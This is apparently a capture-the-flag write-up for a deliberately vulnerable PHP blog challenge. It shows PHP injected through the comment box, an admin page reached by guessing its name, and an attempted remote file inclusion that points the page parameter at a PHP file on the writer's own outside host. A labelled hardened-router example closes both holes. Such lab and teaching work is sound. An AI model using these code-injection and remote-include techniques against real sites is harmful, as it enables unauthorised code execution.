Hacker1 CTF - Cody's First Blog

Who would dare write their own blog software? Oh wait...

What a train wreck

This challenge has 3 flags, and I've managed to get 2 of them so far:

Flag 0

The "blog post" indicates that the site is powered by PHP. So what happens if we just include some PHP in the comment input box?

    <?php echo '<p>Hello World</p>'; ?>

First flag!

Flag 1

Looking at the page source shows a commented-out anchor:

    <!--<a href="?page=admin.auth.inc">Admin login</a>-->

Loading that path brings up an admin login page. No flag yet, but what if we try just admin.inc? Second flag! And we can approve comments, that's handy!

Flag 2

What are we going to do for the final flag? SQL injection on the login page? XSS in a comment? Maybe we can upload a file and include it? If we can include a remote PHP file maybe we could host it ourselves and inject some code for the target to execute.

    Notice: Undefined variable: title in /app/index.php on line 30

    Warning: include(http://4d4ms.com/lee.php): failed to open stream: Connection refused in /app/index.php on line 21

    Warning: include(): Failed opening 'http://4d4ms.com/lee.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /app/index.php on line 21
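The warnings above show index.php handing the page parameter to include(), and Flag 1 shows the admin page being reachable by name without logging in. The following is an added example of a hardened router that closes both, not the challenge's own code: the vulnerable line is inferred from the warnings, and the page names, the pages/ directory and the is_admin session key are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the challenge's source.
// Vulnerable pattern inferred from the warnings (an assumption):
//   include($_GET['page'] . '.php');
//
// Related php.ini settings worth checking on the host:
//   allow_url_include = Off   ; include() refuses http:// and similar wrappers
//   display_errors    = Off   ; warnings no longer leak /app/index.php paths

// Hypothetical layout: page files live in one directory next to index.php.
const PAGE_DIR = __DIR__ . '/pages';

// Allowlist: request value => [file name, requires an admin session].
const PAGES = [
    'home'       => ['home.inc.php', false],
    'admin.auth' => ['admin.auth.inc.php', false],
    'admin'      => ['admin.inc.php', true],
];

function resolve_page(string $requested, bool $isAdmin): ?string
{
    // Only exact keys are accepted, so URL schemes, "../" sequences and
    // unexpected suffixes never reach include().
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    [$file, $needsAdmin] = PAGES[$requested];
    // The authorization check lives in the router, so knowing the page
    // name (as with admin.inc) is not enough to load it.
    if ($needsAdmin && !$isAdmin) {
        return null;
    }
    return PAGE_DIR . '/' . $file;
}

session_start();
$page    = $_GET['page'] ?? 'home';
$isAdmin = ($_SESSION['is_admin'] ?? false) === true; // hypothetical session key
// ?page[]=x arrives as an array; treat anything that is not a string as unknown.
$path = is_string($page) ? resolve_page($page, $isAdmin) : null;

if ($path === null) {
    http_response_code(404);
    exit('Not found');
}
include $path;
```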